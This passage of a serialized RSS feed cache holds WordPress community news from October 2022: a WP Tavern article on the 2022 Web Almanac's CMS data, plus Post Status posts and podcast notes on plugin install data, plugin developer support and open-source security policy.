+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Michelle Frechette\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:43;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"WPTavern: 2022 Web Almanac Report Finds WordPress Adoption Is Growing, Adds New Page Builder Data\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=138392\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:107:\"https://wptavern.com/2022-web-almanac-report-finds-wordpress-adoption-is-growing-adds-new-page-builder-data\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5935:\"<p>HTTP Archive has published its annual State of the Web report, the <a href=\"https://almanac.httparchive.org/en/2022/\">2022 Web Almanac</a>. The report contains data on page content, user experience, content publishing, and distribution with contextual insights from subject matter experts. It draws from a dataset that evaluates millions of web pages and is continuously updated on a monthly basis. Metrics from the June 2022 crawl, used for the report, are <a href=\"https://github.com/HTTPArchive/httparchive.org/blob/main/docs/gettingstarted_bigquery.md\">publicly queryable</a> on BigQuery.</p>\n\n\n\n<p>The <a href=\"https://almanac.httparchive.org/en/2022/cms\">CMS chapter</a> is of particular interest to WordPress users and product developers. HTTP Archive&#8217;s dataset, which is based on <a href=\"https://www.wappalyzer.com/technologies/cms\">Wappalyzer’s definition</a> of a CMS, identified more than 270 different CMS&#8217;s. WordPress is still leading the market with 35% adoption on mobile—followed by Wix (2%), Joomla (1.8%), Drupal (1.6%), and Squarespace (1.0%). </p>\n\n\n\n<img />\n\n\n\n<p>In contrast to W3Tech&#8217;s stats, which show <a href=\"https://wptavern.com/wordpress-community-attributes-declining-market-share-to-performance-issues-increased-complexity-and-the-lagging-full-site-editing-project\">WordPress market share declining from March &#8211; June 2022</a> and then holding steady, the Web Almanac shows WordPress up 1.4% over 2021 on mobile and 0.2% over 2021 on desktop. The methodologies differ in that W3Tech includes only the top 10 million websites in its statistics, as defined by the <a href=\"https://www.alexa.com/\">Alexa</a> top 10 million and the <a href=\"https://tranco-list.eu/\">Tranco</a> top 1 million list. The Web Almanac&#8217;s data set includes 8,360,179 websites, where 7,905,956 are mobile websites and 5,428,235 are desktop websites. </p>\n\n\n\n<p>Drupal and Joomla are slowly declining and Wix has grown over the past three years, though it still represents just 2% of the CMS market.</p>\n\n\n\n<p>New in the data this year is the top five WordPress page builders. Wappalyzer&#8217;s detection found that 34% of the WordPress websites in the dataset are using a page builder plugin. It would be interesting to see these numbers compared with how many sites are using just the block editor with block plugins, along with sites using the Classic editor and no page builder, but this wasn&#8217;t part of the data collection here.</p>\n\n\n\n<img />\n\n\n\n<p>Elementor is the most popular among the page builders, sitting at 40% of desktop sites and 43% of mobile WordPress sites. WPBakery is not far behind at 34/33%, followed by Divi, SiteOrigin, and Oxygen.</p>\n\n\n\n<p>&#8220;As we see it today, page builders exert significant influence on the performance of a site,&#8221; CMS chapter author Jonathan Wold said. &#8220;Historically, page builders have been anecdotal indicators of poor performance. As one example, our dataset indicates that it’s not uncommon for websites to have multiple page builders installed, adding a significant increase to the resources loaded by a site.</p>\n\n\n\n<p>&#8220;Now that we’re tracking page builder data, we’ll have the opportunity in future editions to evaluate year-over-year changes in page builder adoption and look for correlations in those changes to the overall performance of WordPress as a CMS.&#8221;</p>\n\n\n\n<p>The Web Almanac also published data for Core Web Vitals performance and the results vary widely across CMS&#8217;s. Duda, a drag-and-drop website builder used by less than 1% of websites, is posting the highest numbers with 67% of its sites with passing CWV scores. TYPO3 (62%), Jimdo (61%), and Drupal (50%) are not too far behind. WordPress, which had 19% passing last year is up to 30% in 2022, and is catching up to Joomla (38%) and Wix (39%). Scoring consistently high on Core Web Vitals is more difficult for CMS&#8217;s that are primarily hosted independently around the web, as opposed to a centralized SaaS platform, so improvements here may be more hard won.</p>\n\n\n\n<img />\n\n\n\n<p>The report goes into more detail on the top platform&#8217;s performance across specific metrics, like Largest Contentful Paint (LCP), First Input Delay (FID), and Cumulative Layout Shift (CLS). Median Lighthouse performance scores for most platforms were low and in need of performance across the board. SEO scores are consistently high across all of the leading CMS&#8217;s. </p>\n\n\n\n<p>The median Lighthouse accessibility scores for the top CMS&#8217;s ranges between 77 and 91. WordPress falls in the middle with 86 and Squarespace scored the highest in this category with 91.  </p>\n\n\n\n<p>The report also includes a few other interesting WordPress-specific charts, such as year-over-year adoption by geography. WordPress appears to be the most popular in Spain (39%), Italy (38%), and Japan (38%). </p>\n\n\n\n<img />\n\n\n\n<p>The Web Almanac also published data for WordPress origins with passing scores for Core Web Vitals by geography. Japan is the leader at 52%, followed by Canada (49%) and Germany (48%).</p>\n\n\n\n<p>&#8220;Also worth noting is the large disparity across geographies, with Brazil at 10% total compared to Japan at 52%,&#8221; Wold said in the report. &#8220;Brazil on the low end is growing, though, improving 100% year-over-year. As we evaluate next year’s dataset, it may be worth investigating the low end performers further to identify potential causes and opportunities for improvement.&#8221;</p>\n\n\n\n<p>Check out the full report in the <a href=\"https://almanac.httparchive.org/en/2022/cms\">CMS chapter</a> for a more data on the leading platforms. The <a href=\"https://almanac.httparchive.org/en/2022/\">2022 Web Almanac</a> also includes a trove of information on broader web topics, including accessibility, security, sustainability, interoperability, and more, thanks to the efforts of 108 volunteers.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 07 Oct 2022 17:13:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:44;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Post Status: Trust Issues\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=127151\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"https://poststatus.com/trust-issues/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:10304:\"<h2>WordPress Business News Roundup for the Week of October 3</h2>\n\n\n\n<div class=\"wp-container-37 wp-block-group eplus-wrapper has-theme-palette-2-color has-theme-palette-8-background-color has-text-color has-background\"><div class=\"wp-block-group__inner-container\"><div class=\"wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\"><strong>Cory Miller</strong> asks, &#8220;What can we do to better support our plugin developers and product owners?&#8221; <strong>Katie Keith</strong> offers some clues with the story of her <strong>WordPress</strong>/<strong>WooCommerce</strong> agency and product shop, <strong>Barn2 Plugins</strong>. <strong>Dan Knauss</strong> and <strong>Nyasha Green</strong> talk about microaggressions, the <strong>Active Install Growth Data</strong> story, and US federal legislation aimed at <strong>Open Source Security</strong>. In an increasingly &#8220;demon-haunted world,&#8221; how can we know who is doing what with the hardware and software tools we use? <strong>Ben Gabler</strong>, CEO and Founder of <a href=\"https://Rocket.net\" target=\"_blank\" rel=\"noreferrer noopener\">Rocket.net</a>, is in our <strong>Member Spotlight</strong>. </p></div>\n\n\n<div class=\"wp-block-spacer eplus-wrapper\"></div>\n\n\n\n<p class=\"yoast-reading-time__wrapper\"><span class=\"yoast-reading-time__icon\"></span><span class=\"yoast-reading-time__spacer\"></span><span class=\"yoast-reading-time__descriptive-text\">Estimated reading time:  </span><span class=\"yoast-reading-time__reading-time\">4</span><span class=\"yoast-reading-time__time-unit\"> minutes</span></p>\n</div></div>\n\n\n\n<h2 id=\"h-active-install-charts-removed-from-plugin-repo\"><a href=\"https://poststatus.com/active-install-charts-removed-from-plugin-repo/\">Active Install Charts Removed from Plugin Repo</a></h2>\n\n\n\n<p class=\"has-drop-cap\">In reaction to as-yet-unpublicized details about the abuse of active install data in the WordPress.org plugin repository, the charts displaying that data have been removed from plugin pages in a move expected to be temporary. Important (and familiar) questions are emerging as this story unfolds. While we wish many things had gone differently, <a href=\"https://poststatus.com/active-install-charts-removed-from-plugin-repo/#questions\">the questions that will help the most</a> and move plugin businesses forward have to do with the things they (and anyone in the WordPress community) are always free to do. Most of all, &#8220;<strong>What are winning growth strategies for plugin owners </strong>that aren\'t dependent or overly focused on single measures of success — whether they use the .org repo or not?&#8221; <strong><a href=\"https://poststatus.com/active-install-charts-removed-from-plugin-repo/\">READ →</a></strong></p>\n\n\n\n<ul><li><strong>Cory Miller: </strong><a href=\"https://poststatus.com/what-can-we-all-do-to-better-support-our-plugin-developers/\">What Can We Do Better to Support Our Plugin Developers?</a></li><li><strong>Daniel Schutzsmith:</strong> <a href=\"https://poststatus.com/diversifying-revenue-the-50-coding-50-marketing-lifecycle-active-install-clawback-and-turbo-admin/\">Diversifying Revenue, the 50% Coding / 50% Marketing Lifecycle, Active Install Clawback, and Turbo Admin</a></li></ul>\n\n\n\n<div class=\"wp-container-38 wp-block-group has-theme-palette-8-background-color has-background\"><div class=\"wp-block-group__inner-container\">\n<h3>From the Post Status Archive:</h3>\n\n\n\n<ul><li><strong>Barış Ünver</strong> explains <a href=\"https://poststatus.com/the-decline-of-speed-booster-pack/\">how plugin business owners have used and relied on Active Install data</a> — and what the many challenges are in this space. </li><li>A year ago, <strong>David Bisset</strong> found <a href=\"https://poststatus.com/are-active-installs-of-wordpress-plugins-declining-in-2021/\">the active install growth trendlines point downward</a> for some of the most popular and well-known plugins in the WordPress.org repository.</li></ul>\n</div></div>\n\n\n\n<h2><a href=\"https://poststatus.com/trust-and-distrust-in-wordpress/\">Trust and Distrust: Microaggressions, Active Install Growth Data for Plugins, and Open Source Security</a> — <a href=\"https://poststatus.com/trust-and-distrust-in-wordpress/\">Post Status Excerpt (No. 70)</a></h2>\n\n\n\n<p class=\"has-drop-cap\">In our weekly chat for <strong><a href=\"https://poststatus.com/podcast/the-excerpt/\">Post Status Excerpt</a></strong>, <strong>Nyasha Green</strong> and I take on three big, unavoidable issues in the WordPress community — touching briefly on one that looks like an iceberg dead ahead that no one is paying attention to. All of these issues deal with trust — how it can be harmed and the difficulty (and necessity) of repairing it: 1) racism and microaggressions, 2) the sudden removal and uncertain fate of the active install growth chart in the WordPress.org plugin repository, and 3) open source and security. Briefly discussed: emerging US federal policy that aims to secure open-source software. Zero-trust architecture might work well for networked machines, but human relationships and communities need trust. (<a href=\"https://poststatus.com/trust-and-distrust-in-wordpress/#h-transcript\">Full Transcript</a>) <strong><a href=\"https://poststatus.com/trust-and-distrust-in-wordpress/\">LISTEN →</a></strong> </p>\n\n\n\n<h2>Going from Agency to Products: The Story of Barn2 — Post Status Draft 125</h2>\n\n\n\n<p class=\"has-drop-cap\"><strong>Katie and Andy Keith</strong> started out as a WordPress agency almost a decade ago and then tried to break into WordPress products, first with themes and then plugins. Challenges arose with reliable project management on the agency side while they tried to establish a foothold in the WordPress plugin market after a first attempt with themes. The <strong>WooCommerce Extensions Store</strong> is where their business took off. With niche extensions that had no competition, they ranked very quickly. Other ideas for plugins solved problems in custom development projects for clients. Eventually, the Keiths developed a formula for evaluating new plugin ideas. Learn from their challenges and successes — there are a lot of interesting details that only come from experience. Hosted by <strong>Cory Miller</strong>. (<a href=\"https://poststatus.com/going-from-agency-to-products-the-story-of-barn2/#h-transcript\">Full Transcript</a>) <strong><a href=\"https://poststatus.com/going-from-agency-to-products-the-story-of-barn2/\">LISTEN →</a></strong></p>\n\n\n\n<div class=\"wp-container-39 wp-block-group has-theme-palette-7-background-color has-background\"><div class=\"wp-block-group__inner-container\">\n<h2><a href=\"https://poststatus.com/member-spotlight-ben-gabler/\">Post Status Member Spotlight: Ben Gabler</a></h2>\n\n\n\n<p>Ben has been in the hosting industry for twenty years with a few notable stops along the way at HostGator, HostNine, GoDaddy, and StackPath. He\'s been a fan of WordPress since its early days. In fact, his company HostNine was one of the first companies to auto-install WordPress on a hosting account. <strong><a href=\"https://poststatus.com/member-spotlight-ben-gabler/\">READ&nbsp;→</a></strong></p>\n\n\n\n<blockquote class=\"wp-block-quote has-theme-palette-8-background-color has-background\"><p>Collaborate. Don\'t be afraid to work together! We need to see more partnerships in the WordPress space so we can all work together to provide the ultimate win: customer success.</p><cite>Ben Gabler, CEO and Founder of <a href=\"https://Rocket.net\" target=\"_blank\" rel=\"noreferrer noopener\">Rocket.net</a>.</cite></blockquote>\n</div></div>\n\n\n\n<h2><a href=\"https://poststatus.com/open-source-communities-you-may-not-be-interested-in-cisa-but-cisa-is-very-interested-in-you/\">Open Source Communities: You May Not Be Interested in CISA, But CISA is Very Interested in You</a></h2>\n\n\n\n<p class=\"has-drop-cap\">United States national security interests are poised to become more invested in and engaged with open-source projects classified as public infrastructure. From <strong>Log4j</strong> to the <strong>Securing Open Source Software Act</strong>, how did it all come together in 2022, and what may lie ahead? <strong><a href=\"https://poststatus.com/open-source-communities-you-may-not-be-interested-in-cisa-but-cisa-is-very-interested-in-you/\">READ →</a></strong></p>\n\n\n\n<ul><li><a href=\"https://poststatus.com/when-the-free-rider-is-government/\">When the Free Rider is Government</a> — <strong>Chinmayi Sharma</strong> argues our digital infrastructure is built on open source, and it cannot provide adequate security so governments should help out.</li><li><strong>Open Source Software Security Summit 2:</strong> <a href=\"https://openssf.org/oss-security-mobilization-plan/\">10 areas of focus to improve OSS security</a></li><li>A <a href=\"https://amendments-rules.house.gov/amendments/LANGEV_068_xml220128115401119.pdf\">proposed amendment</a> to <a href=\"https://www.congress.gov/bill/117th-congress/house-bill/4521\">HR 4521</a>, the <strong>America COMPETES Act of 2022,</strong> would authorize the creation of a set of Critical Technology Security Centers inside the Department of Homeland Security through CISA, including one focused specifically on open-source security.</li><li>The <strong>Senate Homeland Security and Governmental Affairs Committee</strong> held <a href=\"https://www.hsgac.senate.gov/hearings/responding-to-and-learning-from-the-log4shell-vulnerability\">a hearing</a> on <strong>Log4Shell</strong> and open-source security in February. <strong>GovTech</strong> did a nice <a href=\"https://www.govtech.com/security/apache-software-foundation-talks-log4j-open-source-security\">summary</a> of the event, but there are many details in the speakers\' prepared statements worth reading or viewing. (Speakers include <strong>David Nalley</strong>, Apache Software Foundation • <strong>Brad Arkin</strong>, Cisco Systems • <strong>Jen Miller-Osborn</strong>, Palo Alto Networks • <strong>Trey Herr</strong>, The Atlantic Council) The Q&A; is worth a listen. <a href=\"https://www.hsgac.senate.gov/hearings/responding-to-and-learning-from-the-log4shell-vulnerability\"><strong>WATCH&nbsp;→</strong></a></li></ul>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 07 Oct 2022 16:41:20 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Dan Knauss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:45;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"Post Status: What Can We All Do to Better Support Our Plugin Developers?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=127143\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"https://poststatus.com/what-can-we-all-do-to-better-support-our-plugin-developers/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1952:\"<div class=\"e-content\">\n<p>The recent discussions around the Active Installs data being removed from the WordPress Repo prompted a couple of questions I think we need to answer as a bigger WP community and particularly our members at Post Status.</p>\n\n\n\n<p>As someone who lived in the WordPress product space for 10+ years and had free and paid plugins (<a href=\"https://corymiller.com/why-we-need-a-premium-wordpress-plugin-market/\">found this from 2010</a>), I resonate with the issues and concerns being brought up particularly by plugin developers.</p>\n\n\n\n<p>In the spirit of Mark Zahra\'s <a href=\"https://twitter.com/markzahra/status/1577599271045586949\">&#8220;let\'s work together, not against each other,&#8221;</a> what I want to do here is continue a constructive conversation and help us all make progress together — for the good of WordPress, plugin developers, and users.</p>\n\n\n\n<p>My intention is asked in the spirit of Mark Zahra\'s sentiment of <a href=\"https://twitter.com/markzahra/status/1577599271045586949\">&#8220;let\'s work together, not against each other&#8221;</a> and is simple:</p>\n\n\n\n<p>To give voice to those awesome people and the countless others building WordPress plugins around the world, to help frame the conversation to be clear and constructive, in order to help us all move forward.</p>\n\n\n\n<h3 id=\"h-so-to-our-wordpress-plugin-developers\">So to our WordPress plugin developers &#8230;. </h3>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>What worries, concerns, problems, obstacles, challenges do you have creating, building, maintaining WP plugins? </p><p><span>What are 1-3 initiatives would you prioritize that would create a better, more sustainable environment for you in WP?</span></p></blockquote>\n\n\n\n<p>As always, keep it about the work, never personal. Talk about and share your experiences, not blame. </p>\n</div><p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 07 Oct 2022 15:10:24 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"<span class=\'p-author h-card\'>Cory Miller</span>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:46;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:148:\"Post Status: Post Status Excerpt (No. 70) — Trust and Distrust: Microaggressions, Active Install Growth Data for Plugins, and Open Source Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=127079\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://poststatus.com/trust-and-distrust-in-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:63997:\"<div class=\"e-content\">\n<div class=\"wp-container-39 wp-block-group eplus-wrapper has-theme-palette-2-color has-theme-palette-8-background-color has-text-color has-background\"><div class=\"wp-block-group__inner-container\"><div class=\"wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\">In this episode of Post Status Excerpt, Dan and Ny take on three issues in the WordPress community that can threaten or impair trust while also revealing how foundational trust and healthy communication are: 1) racism and microaggressions, 2) the sudden removal and uncertain fate of the active install growth chart in the WordPress.org plugin repository, and 3) open source and security. Briefly discussed: emerging US federal policy that aims to secure open source software. Zero-trust architecture might work well for networked machines, but human relationships and communities need trust. </p></div>\n\n\n<div class=\"wp-block-spacer eplus-wrapper\"></div>\n\n\n\n<p class=\"yoast-reading-time__wrapper\"><span class=\"yoast-reading-time__icon\"></span><span class=\"yoast-reading-time__spacer\"></span><span class=\"yoast-reading-time__descriptive-text\">Estimated reading time:  </span><span class=\"yoast-reading-time__reading-time\">45</span><span class=\"yoast-reading-time__time-unit\"> minutes</span></p>\n</div></div>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<p class=\"has-drop-cap\">In this episode of Post Status Excerpt, Dan and Ny take on three issues in the WordPress community that can threaten or impair trust while also revealing how foundational trust is, especially in open source. </p>\n\n\n\n<p>First, they talk about Ny\'s article at MasterWP, &#8220;<a href=\"https://masterwp.com/enough-with-this-woke-stuff-and-other-racist-speech-you-can-unlearn/\">Enough with this woke stuff: and other racist speech you can unlearn</a>,&#8221; which explains microaggressions and received a significant number of macroaggressions in reply — but also far more positive support from the community. </p>\n\n\n\n<p>Next, &#8220;How do we rebuild trust when it\'s harmed?&#8221; is a question that leads into the biggest WordPress story of the week — Matt Mullenweg\'s apparent decision to shut down access to active install data at the <a href=\"http://wordpress.org/\">WordPress.org</a> plugin repo due to an unspecified security breach and/or privacy concern. The way communication has happened — or hasn\'t happened — about this decision is clearly damaging trust in the WordPress community, particularly among business owners with a product in the plugin repository. Ny points out how this all looks to a newcomer to the WordPress community — again, trust takes a beating. But while we lack clarity about the po.  ssible return of install data in some form, Dan suggests asking why this data is trusted and valued by many plugin owners. What business decisions can it helpfully inform? Are there alternative and possibly better sources of data about a plugin\'s users? </p>\n\n\n\n<p>Finally, Dan briefly talks about the emergence of draft legislation in the US Senate: the Securing Open Source Software Act. It seems likely that in the near future, US security agencies will be getting people, dollars, and new organizations involved in assessing risk in open-source software. Are WordPress auto-updates critical supply chain infrastructure? When should individual freedoms be exchanged for collective security? When do we need to know what our machines and software are doing? When don\'t we? Zero-trust architecture might work well for networked machines, but human relationships and communities need trust.</p>\n\n\n\n<p></p>\n\n\n\n<blockquote><p>Trust can be betrayed in so many ways or failed even with the best of intentions.</p><cite><strong>Dan Knauss</strong></cite></blockquote>\n\n\n\n<p></p>\n\n\n\n<h3><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f517.png\" alt=\"🔗\" class=\"wp-smiley\" /> Mentioned in the show:</h3>\n\n\n\n<ul><li>Nyasha Green, <a href=\"https://masterwp.com/enough-with-this-woke-stuff-and-other-racist-speech-you-can-unlearn/\">Enough with this woke stuff: and other racist speech you can unlearn</a> (MasterWP)</li><li>Mark Zahra, <a href=\"https://masterwp.com/a-sudden-change-leaves-wordpress-plugin-devs-in-the-dark/\">A sudden change leaves WordPress plugin devs in the dark</a> (MasterWP)</li><li>Dan Knauss, <a href=\"https://poststatus.com/active-install-charts-removed-from-plugin-repo/\">Active Install Charts Removed from Plugin Repo</a> (Post Status)</li><li>Dan Knauss, <a href=\"https://poststatus.com/open-source-communities-you-may-not-be-interested-in-cisa-but-cisa-is-very-interested-in-you/\">Open Source Communities: You May Not Be Interested in CISA, But CISA is Very Interested in You</a> (Post Status)</li><li>Cory Doctorow, <a href=\"https://boingboing.net/2017/09/05/internet-of-lying-things.html\">Our technology is haunted by demons controlled by transhuman life-forms</a></li></ul>\n\n\n\n<div class=\"wp-container-42 wp-block-columns has-theme-palette-8-background-color has-background\" id=\"WP-Engine\">\n<div class=\"wp-container-40 wp-block-column\">\n<h3><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f64f.png\" alt=\"🙏\" class=\"wp-smiley\" /> Sponsor: <a href=\"https://poststat.us/a2-hosting\">A2 Hosting</a></h3>\n\n\n\n<p><strong>A2Hosting offers solutions for WordPress and WooCommerce that are both blazing fast and ultra-reliable.</strong> WordPress can be easily deployed on <em>ANY</em> web hosting plan from A2: Shared, VPS, or Dedicated. A2 also offers Managed WordPress and WooCommerce Hosting. Take a look at <a href=\"http://a2hosting.com\" target=\"_blank\" rel=\"noreferrer noopener\">a2hosting.com</a> today!</p>\n</div>\n\n\n\n<div class=\"wp-container-41 wp-block-column is-vertically-aligned-center\"><div class=\"wp-block-image\">\n<a href=\"https://poststatus.com/planet/feed/a2hosting.com\"><img width=\"304\" height=\"304\" src=\"https://cdn.poststatus.com/wp-content/uploads/2022/07/88b63da0-f90b-11e6-bc40-730c4553c727.png\" alt=\"A2 Hosting\" class=\"wp-image-101225\" title=\"WP Engine\" /></a></div></div>\n</div>\n\n\n\n<h3><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f44b.png\" alt=\"👋\" class=\"wp-smiley\" /> Credits</h3>\n\n\n\n<ul id=\"block-a3e9962f-97ca-4009-be8e-db47b5d1fddf\"><li><a href=\"https://twitter.com/Ny_The_Creator\">Nyasha Green</a>, Editorial Director at&nbsp;<a href=\"https://twitter.com/_MasterWP\">MasterWP</a>&nbsp;(Twitter)</li><li><a href=\"https://twitter.com/dan_knauss\">Dan Knauss</a><span>, Editor for </span><a href=\"https://twitter.com/post_status\">Post Status</a><span> (Twitter)</span></li><li><a href=\"https://twitter.com/lemonadecode\">Olivia Bisset</a>, Web Producer intern for <a href=\"http://twitter.com/post_status\">Post Status</a> (Twitter)</li></ul>\n\n\n\n<p class=\"has-background\">Every week <strong><a href=\"https://poststatus.com/podcast/the-excerpt/\">Post Status Excerpt</a></strong> will bring you a conversation about important news and issues in the WordPress community and business ecosystem. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f399.png\" alt=\"🎙\" class=\"wp-smiley\" /><br /><br />You can listen to <a href=\"https://poststatus.com/podcast/the-excerpt/\">past episodes</a> of <strong>The Excerpt</strong>, <a href=\"https://poststatus.com/category/post-status-podcasts/\">browse all our podcasts</a>, and don’t forget to subscribe on <a href=\"https://open.spotify.com/show/1m3xwXbe0MG5BzFVPtB0A7\">Spotify</a>, Amazon Music, <a href=\"https://podcasts.google.com/feed/aHR0cHM6Ly9mZWVkcy5zaW1wbGVjYXN0LmNvbS8ySkU5c2M4UA\">Google Podcasts</a>, <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\">iTunes</a>, <a href=\"https://castro.fm/podcast/c53552c6-1ee0-4fc4-9de4-08ed6bf1ee4d\">Castro</a>, <a href=\"https://www.youtube.com/c/PostStatus\">YouTube</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\">Stitcher</a>, <a href=\"https://player.fm/series/wordpress-post-status-podcasts\">Player.fm</a>, <a href=\"https://pca.st/05rR\">Pocket Casts</a>, <a href=\"https://wordpress-post-status-draft-podcast.simplecast.com/\">Simplecast</a>, or by <a href=\"https://feeds.simplecast.com/2JE9sc8P\">RSS</a>. <img 